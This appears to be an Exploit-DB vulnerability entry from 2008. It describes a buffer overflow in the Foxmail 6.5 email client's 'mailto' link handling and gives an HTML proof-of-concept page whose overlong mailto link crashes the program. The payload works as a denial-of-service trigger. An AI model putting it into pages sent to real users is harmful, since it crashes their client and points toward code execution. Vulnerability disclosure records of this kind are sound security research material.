Foxmail Email Client 6.5 - 'mailto' Buffer Overflow (PoC)

EDB-ID:

32400


Author:

sebug

Type:

dos


Platform:

Multiple

Date:

2008-09-22


source: https://www.securityfocus.com/bid/31294/info

Foxmail Email Client is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Foxmail Email Client 6.5 is vulnerable; other versions may also be affected. 

<html> <body> <P>Author:friddy QQ:568623 <P>Result:Program Crash <BR> <A href="mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com">ClickME</a> >Clickme</A> </body> </html>